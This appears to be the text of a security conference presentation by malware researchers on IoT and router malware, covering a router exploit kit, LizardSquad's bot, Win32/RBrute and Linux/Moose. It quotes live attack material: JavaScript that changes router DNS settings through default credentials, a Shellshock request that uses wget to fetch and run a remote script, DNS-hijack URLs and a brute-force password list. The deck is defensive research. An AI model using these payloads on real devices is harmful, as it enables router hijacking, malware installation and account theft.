source: Malwarebytes
Malware Researcher at ESET
CTF lover
Open source contributor
Security Researcher at GoSecure
Previously
Malware Researcher at ESET
Infosec lecturer at ETS University in Montreal
Infosec developer, network admin, linux system admin
Co-founder Montrehack (hands-on security workshops)
VP Training and Hacker Jeopardy at NorthSec
About IOT
Exploit Kit
LizardSquad
Win32/RBrute
Linux/Moose
Conclusion
Hard to detect
Hard to remediate
Hard to fix
Low hanging fruit for bad guys
Several cases disclosed in the last few years
A lot of same-old background noise (DDoSer)
Things are only getting worse
Automate exploitation
Targets browsers
Common exploits are Adobe and Java
source: Malwarebytes
Cross-Site Request Forgery (CSRF)
Uses default credential (HTTP)
Changes primary Domain Name System (DNS)
<html><head><script type="text/javascript" src="e_x.js"></script></head>
<body>
<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
<script language="javascript">
var pDNS = "37.139.50.45";
var sDNS = "8.8.8.8";
var passlist=["123456789","root","admin","qwerty","123456789","baseball","football","monkey","letmein","abc123","tata","<eopl>"];
function e_belkin(ip){
var method = "POST";
var url = "";
var data ="";
url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
exp(url, "", "GET");
url="http://"+ip+"/cgi-bin/setup_dns.exe";
data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
exp(url, data, method);
}
Obfuscation
Exploits for CVEs
CVE-2015-1187
D-Link DIR-636L
Remote Command Injection
Incorrect Authentication
Exploit Kit
Change DNS
Fileless
Universal XSS on all HTTP sites fetching Javascript on a 3rd party domain
Phishing
Adfraud
Injection via Google Analytics domain hijacking
Javascript runs in context of every page
'adcash': function() {
var adcash = document.createElement('script');
adcash.type = 'text/javascript';
adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944';
document.body.appendChild(adcash);
},
Black hat hacking group
Lots of Distributed Denial of Service (DDoS)
DDoS PlayStation Network and Xbox live in Christmas 2014
Bomb threats
DDoS for hire (LizardStresser)
Linux/Gafgyt
Linux/Powbot, Linux/Aidra, Kaiten, …
Probably others, as source is public
Telnet scanner
Flooding: UDP, TCP, Junk and Hold
Multiple architectures: SuperH, MIPS, ARM, x86, PowerPC, …
"*****************************************"
"* WELCOME TO THE BALL PIT *"
"* Now with *refrigerator* support *"
"*****************************************"
Shellshock
SSH credentials brute-force
Telnet credentials brute-force
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: () { goo;}; wget -qO - http://o.kei.su/qn | sh > /dev/null 2>&1 &
HTTPS support
CloudFlare protection bypass
LizardStresser database was leaked
Passwords in plaintext…
------- Day changed to 08/25/15 -------
09:32 -!- There are 0 users and 2085 invisible on 1 servers
09:32 -!- 42 unknown connection(s)
09:32 -!- 3 channels formed
09:32 -!- I have 2085 clients and 0 servers
09:32 -!- 2085 2119 Current local users 2085, max 2119
09:32 -!- 2085 2119 Current global users 2085, max 2119
12:56 -!- Topic for #Fazzix: 1k
12:56 -!- Topic set by void <> (Wed Aug 19 09:58:45 2015)
12:56 [Users #Fazzix]
12:56 [~void] [~void_] [@bob1k] [@Fazzix] [ Myutro]·
12:56 -!- Irssi: #Fazzix: Total of 5 nicks (4 ops, 0 halfops, 0 voices, 1 normal)
12:56 -!- Channel #Fazzix created Mon Aug 17 03:11:29 2015
12:56 -!- Irssi: Join to #Fazzix was synced in 2 secs
Tries to find administration web pages (IP)
Scan and report
Router model is extracted from the realm attribute of the HTTP authentication
$ strings rbrute.exe
[...]
TD-W8901G
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-W8961ND
TD-8816
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
ZXV10 W300
[...]
DSL-2520U
DSL-2600U
DSL router
TD-W8901G
TD-W8901G 3.0
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-8840T 2.0
TD-W8961ND
TD-8816
TD-8817 2.0
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
[...]
Logins: admin
, support
, root
& Administrator
Password list retrieved from the CnC
<empty string>
111111
12345
123456
12345678
abc123
admin
Administrator
consumer
dragon
gizmodo
iqrquksm
letmein
lifehack
monkey
password
qwerty
root
soporteETB2006
support
tadpassword
trustno1
we0Qilhxtx4yLGZPhokY
http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Save
http://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=<malicious_DNS>&dnsSecondary=8.8.8.8
Simple redirection to fake Chrome installer (facebook or google domains)
Install (user action required)
Change primary DNS on the computer (via key registry)
HKLM/SYSTEM/ControlSet001/Services/Tcpip/Parameters/Interfaces/{network interface UUID}/NameServer = “8.8.8.8”
Infected user
Infected router
Everyone is infected
November 2014: Discovered by ESET
Early 2015: Thoroughly reverse-engineered
May 2015: Paper published
aka Malware description
Named after the string "elan" present in the malware executable
The Slovak rock band (from 1969 and still active)
Pivot through firewalls
Home-made NAT traversal
Custom-made Proxy service
only available to a set of whitelisted IP addresses
Remotely configured generic network sniffer
Telnet credentials bruteforce
Wordlist of 304 user/pass entries sent by server
Statically linked binary stripped of its debugging symbols
Hard to reproduce environment required for malware to operate
Misleading strings (getcool.com)
No x86 variant!
The Malware Operation
Network sniffer was used to steal HTTP Cookies
Twitter: twll
, twid
Facebook: c_user
Instagram: ds_user_id
Google: SAPISID
, APISID
Google Play / Android: LAY_ACTIVE_ACCOUNT
Youtube: LOGIN_INFO
Targeted social networks
Proxy access is protected by an IP-based Whitelist
So we can’t use the proxy service to evaluate malware population
Blind because of HTTPS enforced on social networks
Few weeks after the publication the C&C servers went dark
After a reboot, all affected devices should be cleaned
But victims compromised via weak credentials, so they can always reinfect
New sample in September
New proxy service port (20012)
New C&C selection algorithm
Few differences
Still under scrutiny
But more on this botnet in another presentation!
Embedded malware
Not yet complex
Tools and processes need to catch up
A low hanging fruit
Prevention simple
Change default passwords!
even of your friends' routers!
until the next shellshock …
Thank you!
Special thanks to ESET Canada Research Team
@obilodeau
@nyx__o